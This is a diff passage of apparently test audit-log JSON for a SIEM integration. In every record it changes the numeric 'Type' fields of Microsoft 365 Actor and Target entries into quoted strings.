{ "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14322,19 +14322,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14420,27 +14420,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14504,19 +14504,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14602,27 +14602,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14686,19 +14686,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14784,27 +14784,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14869,27 +14869,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14975,27 +14975,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15060,27 +15060,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15166,27 +15166,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15251,27 +15251,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15357,27 +15357,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15441,19 +15441,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15539,27 +15539,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15623,19 +15623,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15721,27 +15721,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15805,19 +15805,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15903,27 +15903,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15988,27 +15988,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -16094,27 +16094,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -16179,27 +16179,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -16285,27 +16285,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -16370,27 +16370,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -16476,27 +16476,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -16574,27 +16574,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -16680,27 +16680,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -16778,27 +16778,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -16884,27 +16884,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -16982,27 +16982,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -17088,27 +17088,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -17186,27 +17186,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -17292,27 +17292,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -17390,27 +17390,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -17496,27 +17496,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -17594,27 +17594,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -17700,27 +17700,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -17798,27 +17798,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -17904,27 +17904,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -18002,27 +18002,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -18108,27 +18108,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -18206,27 +18206,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -18312,27 +18312,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -18410,27 +18410,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -18516,27 +18516,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -18614,27 +18614,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": 